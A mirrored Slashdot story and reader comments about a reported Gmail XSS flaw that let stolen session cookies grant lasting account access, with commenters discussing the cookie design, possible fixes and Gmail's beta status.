Slashdot Mirror

← Back to Stories (view on slashdot.org)

Gmail Accounts Vulnerable to XSS Exploit

Posted by michael on from the ooooooops dept.

mallumax writes "A security hole in GMail has been found (an XSS vulnerability) which allows access to user accounts without authentication. What makes the exploit worse is the fact that changing passwords doesn't help. The full details of the exploit haven't been disclosed. The vulnerability was reported by Israeli news site Nana. They were tipped off by an Israeli hacker. Google has been notified and they are working to close the hole. The Register has the story here."

20 of 232 comments (clear)

  1. Oh no! by scaaven · · Score: 5, Funny

    My google stock. My poor google stock!

    --
    I know I'm going to be modded up on this
  2. Google needs to toss its cookies... by LostCluster · · Score: 5, Informative

    The articles reveal that the basic design of the bug is to snatch the victim's cookie, and then the hacker can use that cookie to get into the account forever more. That cookie will always lead to the victim's account no matter what... even if they log out, even if they change their password, the cookie will still be valid authentication.

    The XSS part is just an example of a way to steal the user's cookie. Clearly, any other way you can think of to grab a cookie file would work just as well.

    It's a surprisingly bad design by Google standards. By assigning an forever-good cookie value each users account, it eliminates the need to re-login at home after using GMail at a public terminal, but the problem is if that cookie value ever falls into enemy hands the account is compromised and cannot be re-secured. Re-assigning the cookie value at each logon is the more traditional way of securing such things, although that means users who hop between more than one computer or even browser would have re-authenticate every time they changed.

    1. Re:Google needs to toss its cookies... by LostCluster · · Score: 5, Informative

      The cookie file gets invalidated... but the problem is if you log back in, instead of getting a new value in your new cookie, apparently you get the same old value again. And worse yet, even if you don't log in again, bringing back that old cookie from the dead is all that's needed to log in.

      It's not the experation date on the cookie that's the problem, it's the fact that their database still assocates "your cookie" with your account even if there's no authorized cookie in circulation.

    2. Re:Google needs to toss its cookies... by kinema · · Score: 5, Informative
      What I don't like about it is that it doesn't use SSL after you log in.
      Actaully if you enter "https://gmail.google.com/gmail" in the location bar of your favorite browser you will continue to use a SSL secured connetion after for the duration of your session.
  3. Oh my god! by Zangief · · Score: 5, Funny

    Maybe some hacker will make a program to break into every gmail account, read their mail, and send them ads about what people are talking about in mails!!!

  4. sweet grapes by yahyamf · · Score: 5, Funny

    I waited so long to get a Gmail account, I don't care if it sucks now... I also like Doom3...

  5. I must do my part to help. by teamhasnoi · · Score: 5, Funny

    The first person to fix the exploit will get a FREE GMAIL INVITE!

  6. PSA: XSS cookie theft by whovian · · Score: 5, Informative

    Never heard of XSS until now (like me)? Here is one summary one summary of what the cookie theft looks like.

    --
    To-do List: Receive telemarketing call during a tornado warning. Check.
  7. Need more than just the username by Dominic_Mazzoni · · Score: 5, Informative

    I may be misinterpreting the story, but it sounds to me like you need more than just the username: you need to actually trick the user into giving you their GMail cookie by phishing. Obviously, this is a huge security hole and Google should fix it immediately, but it's not quite the same as the Hotmail backdoor from last year, which didn't require phishing at all. As long as you don't ever click on a link that sends you to GMail from an untrusted source, you should be safe.

    1. Re:Need more than just the username by poot_rootbeer · · Score: 5, Insightful

      you need to actually trick the user into giving you their GMail cookie by phishing. ...or by grabbing the cookies left behind by previous users off a public terminal.

      But that's a minor concern, no one ever uses a public computing terminal to check webmail, or walks away without logging out properly.

  8. Good thing they are still in beta. by bill_kress · · Score: 5, Funny

    They caught this problem in beta, just as should be done! Bravo!

    Brings some true professionalisim to an industry where companies actually ship/sell products with bugs like this all the time.

  9. Re:XSS isn't that big a deal by phasm42 · · Score: 5, Interesting

    XSS is not the real problem here. The real problem is that the cookie can be used to authenticate an account. If you get a copy of the cookie and take it to another machine, you could log on using that cookie, even after the cookie has expired. This is a poor design, and XSS is just one way to exploit this. Another would be to simply copy Mozilla's cookies.txt file, or whatever browser you use. Or to sniff out the cookie over the network and use it from then on.

    --
    "No one likes working in a hamster wheel, and your shop smells of cedar shavings from here." - TaleSpinner
  10. Re:it IS a beta... by buzzini · · Score: 5, Insightful

    Labeling something "beta" almost indefinitely should not be a get-out-of-jail-free card. It seems to me that once a product is in fairly widespread use -- once a product has a marketing plan behind it -- saying "no fair, it's a beta!" is a little disingenuous.

  11. Easy Fix: by thesandtiger · · Score: 5, Insightful

    1) Gmail plugs the hole.

    2) They change the cookie validation test script in this case to require a different cookie than ones that were being given while the exploit was active.

    3) When a counterfeit cookie (or any of the old cookies) tries to validate it's immediately seen as invalid, and the user is then made to login.

    Of course, if someone already got at your stuff, well, that's bad.

    --
    Since I can't tell them apart, I treat all ACs as the same person.
  12. Wives by mekanizer · · Score: 5, Funny

    Time to read our wives e-mail to see if they are cheating or something.

  13. Re:I got it by Anonymous Coward · · Score: 5, Funny

    Yeah, I agree. Your gmail account is the best mail I've ever used.

    - Anonymous Cookie monster

  14. Re:Now everybody,not just Google,can read your ema by iMaple · · Score: 5, Funny

    what's the difference if a few Hackers get a hold of your account?

    You know its not just as simple as you think. I mean I dont care if a few hackers read my email, but what if they decide to use sensitive info in it or delete it.

    I run an e-business from Nigeria and earn some money in the process. People email me their bank account numbers, creditcard numbers ,SSNs and what not (I am creative). Now if some immoral hacker got hold of that data , the poor users would be duped twice, and I would feel really bad abt it (I mean I could have got twice the money myself if I wanted). So I request Gmail to help the Nigerian revolution and our fight against AIDS and dictators and fix the bug as soon as possible.

  15. Re:it IS a beta... by RetroGeek · · Score: 5, Informative

    Beta should be reserved for functionality, GUI, and interoperability issues.

    No that is alpha. Once all the functionality is complete, the GUI has been approved, and the application can talk to the other applications it needs to, THEN the product goes into beta testing.

    Beta is there to locate any bugs which made it past the alpha testers. Beta apps are considered feature complete.

    --

    - - - - - - - - - - -
    I am a programmer. I am paid to produce syntax not grammar. Deal with it.
  16. Re:it IS a beta... by WIAKywbfatw · · Score: 5, Insightful

    Care to explain what marketing plan for Gmail you've seen? So far, Google has issued a couple of press releases - announcing its intention to offer email services, etc - but nothing more than that, and it's made it repeatedly clear that the service is in beta.

    Have you ever seen more than that? Have you seen any advertising (banner or otherwise) for the service? Just how do you contend that Google is marketing it?

    And how the hell are you defining "fairly widespread use"? Just how many Gmail accounts do you think there are? 100,000? A million? Well, in comparison, how many Microsoft Hotmail or Yahoo Mail accounts do you think there are out there? I'd be surprised if Gmail had even a hundredth of the user base that its key competitors possess.

    Gmail is in beta. Until they say it's not in beta please accept that nothing should be taken for granted. And the fact is that even "shipped" products aren't error free, so either learn to accept that things sometimes go wrong with software or just stop using a PC altogether.

    --

    "Accept that some days you are the pigeon, and some days you are the statue." - David Brent, Wernham Hogg
  17. Gmail just logged me out - a quickfix already? by adnonsense · · Score: 5, Interesting

    I was using the "don't ask my password for two weeks" feature - Gmail just logged me out although the two weeks aren't up, and after logging in again I had a session ID tacked on to the URL like this:

    http://gmail.google.com/gmail?_sgh=2f3ab242adinf in itum

    which I've never seen before.

    I think it'll be a long Friday night at the 'Plex.